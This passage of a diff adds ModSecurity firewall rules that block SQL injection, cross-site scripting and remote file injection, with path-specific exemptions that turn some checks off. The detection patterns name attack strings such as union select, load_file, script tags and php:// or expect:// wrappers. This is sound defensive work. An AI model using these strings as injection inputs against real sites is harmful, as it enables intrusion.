+SecRule REQUEST_FILENAME "/wysiwyg/save\.php" "phase:2,id:91055,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340113,ctl:ruleRemovebyID=341211,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91056,t:none,pass,nolog,skipAfter:END_RULES_91056"
+
+SecRule ARGS|!ARGS:/^Dialog/|!ARGS:/^content/|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch,id:340472,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule ARGS|!ARGS:/^Dialog/|!ARGS:/^content/|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:serverurl|!ARGS:referrer|!ARGS:url|!ARGS:team[url]|!ARGS:helpurl|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/"  "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/modules/wysiwyg/save.php)',deny,log,auditlog,status:403"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+
+
+SecMarker END_RULES_91056
+
+SecRule REQUEST_FILENAME "/admin/index\.php" "phase:2,id:91057,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=390613,ctl:ruleRemovebyID=380018,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=340016,ctl:ruleRemovebyID=340157,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340162,ctl:ruleRemovebyID=340165,ctl:ruleRemovebyID=340163"
+SecAction "phase:2,id:91058,t:none,pass,nolog,skipAfter:END_RULES_91058"
+
+SecRule ARGS|!ARGS:/description/|!ARGS:keywords|!ARGS:tiny_vals|!ARGS:info|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:Post|!ARGS:text|!ARGS:pagetext|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:/teaser/ "(?:\b(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]] .{,100} update.+set.+=|union all select |\bunion\b.{1,100}?\bselect\b.[a-z][0-9]+ |select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()"  "phase:2,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:370144,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2',logdata:'%{TX.0}',deny,log,auditlog,status:403"
+
+SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:comment|!ARGS:keywords|!ARGS:info|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:wysiwyg|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/|!ARGS:/teaser/ "(?:\b(?:select|grant|delete|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.*[a-z0-9].*into.*from|select (?:load_file|char\()|(?:insert|remark)test;|insert[[:space:]]+[a-z|0-9|\*|\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+\()" "phase:2,capture,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:370016,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection',logdata:'%{TX.0}',deny,log,auditlog,status:403"
+# Rule 340147: Generic XSS filter
+SecRule ARGS "!(^(submit\+>>|>>)$)" "phase:2,t:none,t:urlDecodeUni,t:lowercase,capture,id:340247,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',chain,logdata:'%{TX.0},%{matched_var_name}',deny,log,auditlog,status:403"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/catDesc/|!ARGS:/^blog_/|!ARGS:/^information/|!ARGS:/pDesc/|!ARGS:infoDescription|!ARGS:output|!ARGS:ad|!ARGS:notice|!ARGS:/custom_block/|!ARGS:/google/|!ARGS:/^information_description/|!ARGS:/category_description/|!ARGS:/formcode/|!ARGS:val333|!ARGS:/module/|!ARGS:stylesheet|!ARGS:wysiwyg|!ARGS:/embed/|!ARGS:udesc|!ARGS:description|!ARGS:ldesc|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/cms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:phpcode|!ARGS:intro|!ARGS:Snippet|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:input[Desarrollo]|!ARGS:move2|!ARGS:hoperation|!ARGS:login_form|!ARGS:/product_benefits/|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:bbcode_tpl|!ARGS:Right_photo_1|!ARGS:embedVideo|!ARGS:/^K2ExtraField/|!ARGS:mentorhelp|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:/^fck/|!ARGS:parent_name|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:/VB_announce/|!ARGS:guardar|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:ticket_response|!ARGS:/element/|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:/tekst/|!ARGS:embeddump|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions|!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^elm/|!ARGS:verbiage|!ARGS:news|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/footer/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:(?:java|vb)?script|about|applet|activex|chrome) ?>|< ?/?i?frame|\%env)"  "t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace"
+
+SecRule ARGS "!(^(submit\+>>|>>)$)"  "phase:2,deny,status:403,log,auditlog,chain,t:none,t:urlDecodeUni,t:lowercase,capture,id:340248,rev:2,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/catDesc/|!ARGS:/^blog_/|!ARGS:/^pdesc/|!ARGS:/^information/|!ARGS:ad|!ARGS:/pDesc/|!ARGS:/module/|!ARGS:/custom_block/|!ARGS:/google/|!ARGS:/embed/|!ARGS:/category_description/|!ARGS:notice|!ARGS:/formcode/|!ARGS:val333|!ARGS:wysiwyg|!ARGS:onlineusers|!ARGS:offlineusers|!ARGS:description|!ARGS:fdesc|!ARGS:ldesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:sml_prt_1|!ARGS:pay_inst_1|!ARGS:/^jform/|!ARGS:eip_value|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:video_credits|!ARGS:move2|!ARGS:input[Desarrollo]|!ARGS:hoperation|!ARGS:arg2|!ARGS:login_form|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:/submitcode/|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:categories_title|!ARGS:antwoord|!ARGS:project_company|!ARGS:signature|!ARGS:paepdc|!ARGS:tpl_source|!ARGS:teaser_js|!ARGS:/^autoDS/|!ARGS:FrmSide|!ARGS:mainKeywords|!ARGS:guardar|!ARGS:/VB_announce/|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:newyddionc|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:bedrijfsprofiel|!ARGS:s_query|!ARGS:finish_survey|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:embeddump|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:c_features|!ARGS:/tekst/|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:verbiage|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:preview__hidden|!ARGS:order|!ARGS:youtube|!ARGS:/post/|!ARGS:reply|!ARGS:business|!ARGS:navig|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(?:< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|zlib|(ht|f)tps?)\:/|alert ?\(|<? (?:(?:java|vb)?script|applet|activex|chrome) ?>|< ?/?i?frame|\% ?env)"  "t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,multiMatch"
+
+# Rule 340249:  XSS injection
+SecRule ARGS "!(^(submit\+>>|>>)$)" "phase:2,chain,t:none,t:removeNulls,t:urlDecodeUni,t:lowercase,t:compressWhitespace,capture,id:340249,rev:3,severity:2,msg:'Atomicorp.com WAF Rules: Potential Cross Site Scripting Attack',logdata:'%{TX.0}',deny,log,auditlog,status:403"
+SecRule REQUEST_URI "!(^/admin/index\.php\?route=module/)" chain
+SecRule REQUEST_URI|ARGS|!ARGS:/catDesc/|!ARGS:/^pdesc/|!ARGS:/welcome_module/|!ARGS:onlineusers|!ARGS:offlineusers|!ARGS:stylesheet|!ARGS:stylesheet|!ARGS:/category_description/|!ARGS:notice|!ARGS:wysiwyg|!ARGS:/formcode/|!ARGS:val333|!ARGS:ldesc|!ARGS:fdesc|!ARGS:/footer/|!ARGS:xdescription|!ARGS:description|!ARGS:/embed/|!ARGS:desc|!ARGS:design_description|!ARGS:/^p_process_chats/|!ARGS:obj_itop|!ARGS:/wyscms/|!ARGS:eventDescription|!ARGS:/^product/|!ARGS:descr|!ARGS:/products_description/|!ARGS:match_report|!ARGS:/product_desc/|!ARGS:description_short_1|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/form/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:paepdc|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/header/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:i?frame ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|(?:\.add|\@)import|asfunction\:|background-image\:|\be(?:cma|xec)script\b|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc ?=|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|event|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" "t:none,t:removeNulls,t:utf8tounicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsdecode,t:cssdecode,t:lowercase,t:compressWhitespace"
+SecRule REQUEST_URI|ARGS|!ARGS:form[pagina_text]|!ARGS:descripcion|!ARGS:description|!ARGS:message|!ARGS:comments|!ARGS:content "(?:(\w+)and(\w+)char\([0-9]+\)|(?:execute|convert)\(|(?:\;delete.{1,100};(?:insert|declare @|varchar) ?|(?:and .{1,100} \(select |\b(?:drop|create)(\w+)table |declare .{1,100} varchar\())|convert\(varchar|null,(?:null,(?:null|accesslevel|user_name),|concat\()|union select |union all select)" "phase:2,id:340457,t:replaceNulls,t:htmlEntityDecode,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL inline command protection (/admin/index.php exclude)',deny,log,auditlog,status:403"
+
+SecRule REQUEST_URI "!(pagemode=link_index|^/admin/index\.php\?fuse=admin)" "phase:2,chain,t:none,t:urlDecodeUni,t:lowercase,id:340476,rev:32,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/index.php exclude)',deny,log,auditlog,status:403"
+SecRule ARGS|!ARGS:/^go/|!ARGS:/catDesc/|!ARGS:/corvuspay/|!ARGS:config_name|!ARGS:config_owner|!ARGS:/ssl/|!ARGS:/^adjust/|!ARGS:/ULTIMATUMControl/|!ARGS:/youtube/|!ARGS:/web/|!ARGS:u|!ARGS:logo|!ARGS:/popup/|!ARGS:liketext|!ARGS:feed|!ARGS:/^field_/|!ARGS:/ping/|!ARGS:/service/|!ARGS:/img/|!ARGS:pp_path|!ARGS:vidid|!ARGS:/^field_id/|!ARGS:/^smeg_serv/|!ARGS:/website/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/app_update/|!ARGS:/gplus/|!ARGS:/twitter/|!ARGS:/google/|!ARGS:bic|!ARGS:cubecart4_path|!ARGS:field_vals|!ARGS:osc_path|!ARGS:events_map|!ARGS:xmlpath|!ARGS:homepage|!ARGS:input|!ARGS:email_contents|!ARGS:/link/|!ARGS:page_content|!ARGS:feed_copyright|!ARGS:/image/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/page/|!ARGS:comments|!ARGS:/^opts/|!ARGS:text|!ARGS:code|!ARGS:outbound|!ARGS:out|!ARGS:referer|!ARGS:referrer|!ARGS:helpbox|!ARGS:website|!ARGS:return|!ARGS:url2send|!ARGS:attach-url|!ARGS:ureferrer|!ARGS:comment|!ARGS:basehref|!ARGS:redirect|!ARGS:refertoyouby|!ARGS:ajaxurl|!ARGS:product[media_gallery][images]|!ARGS:oaparams|!ARGS:loc|!ARGS:backurl|!ARGS:bg_image|!ARGS:imageFile|!ARGS:siteurl|!ARGS:install_url|!ARGS:comments_commentFind|!ARGS:resource|!ARGS:thelink|!ARGS:x_receipt_link_url|!ARGS:params[altTag]|!ARGS:referredby|!ARGS:clickurl|!ARGS:filecontent|!ARGS:inc|!ARGS:link|!ARGS:fck_body|!ARGS:fck_brief|!ARGS:introtext|!ARGS:resource_box|!ARGS:areaContent2|!ARGS:ref|!ARGS:userpicpersonal|!ARGS:blog_url|!ARGS:body|!ARGS:linkdescr|!ARGS:Post|!ARGS:last_msg|!ARGS:params[link]|!ARGS:texty|!ARGS:params[request_url]|!ARGS:pay_list_type|!ARGS:FULL_URL|!ARGS:HOMEPAGE_URL|!ARGS:ATTACHMENTS_URL|!ARGS:templatePath|!ARGS:fulltext|!ARGS:stories_cat|!ARGS:sUrl|!ARGS:config_helpurl|!ARGS:website_link|!ARGS:view|!ARGS:redirect_to|!ARGS:return_link_url|!ARGS:products_image|!ARGS:_wp_original_http_referer|!ARGS:refer|!ARGS:oldmsg|!ARGS:lk_url|!ARGS:SitePath|!ARGS:Exlink|!ARGS:contents|!ARGS:PreviewImage|!ARGS:pagelink|!ARGS:pagefeed|!ARGS:ShopPath|!ARGS:content|!ARGS:right|!ARGS:left|!ARGS:/^myDevEditControl_/|!ARGS:/link/   "^(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/" "chain,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,multimatch"
+SecRule MATCHED_VAR "!@beginsWith http://%{SERVER_NAME}/"
+
+SecRule REQUEST_URI "!(pagemode=link_index|^/admin/index\.php\?fuse=admin)" "phase:2,chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:340477,rev:30,severity:2,msg:'Atomicorp.com WAF Rules: Remote File Injection attempt in ARGS (/admin/index.php exclude)',deny,log,auditlog,status:403"
+SecRule ARGS|!ARGS:/ssl/|!ARGS:/catDesc/|!ARGS:/corvuspay/|!ARGS:/highslide/|!ARGS:config_name|!ARGS:config_owner|!ARGS:/^adjust/|!ARGS:/^go/|!ARGS:/ULTIMATUMControl/|!ARGS:/youtube/|!ARGS:/web/|!ARGS:u|!ARGS:logo|!ARGS:/popup/|!ARGS:feed|!ARGS:liketext|!ARGS:/img/|!ARGS:/^field_/|!ARGS:/ping/|!ARGS:/service/|!ARGS:pp_path|!ARGS:vidid|!ARGS:bic|!ARGS:/^field_id/|!ARGS:/^smeg_serv/|!ARGS:/twitter/|!ARGS:/gplus/|!ARGS:/facebook/|!ARGS:/instagram/|!ARGS:/pinterest/|!ARGS:/website/|!ARGS:/app_update/|!ARGS:/google/|!ARGS:cubecart4_path|!ARGS:osc_path|!ARGS:field_vals|!ARGS:events_map|!ARGS:xmlpath|!ARGS:homepage|!ARGS:input|!ARGS:email_contents|!ARGS:/link/|!ARGS:page_content|!ARGS:feed_copyright|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/image/|!ARGS:/page/|!ARGS:code|!ARGS:comments|!ARGS:/^opts/|!ARGS:text|!ARGS:base_url|!ARGS:outbound|!ARGS:out|!ARGS:refe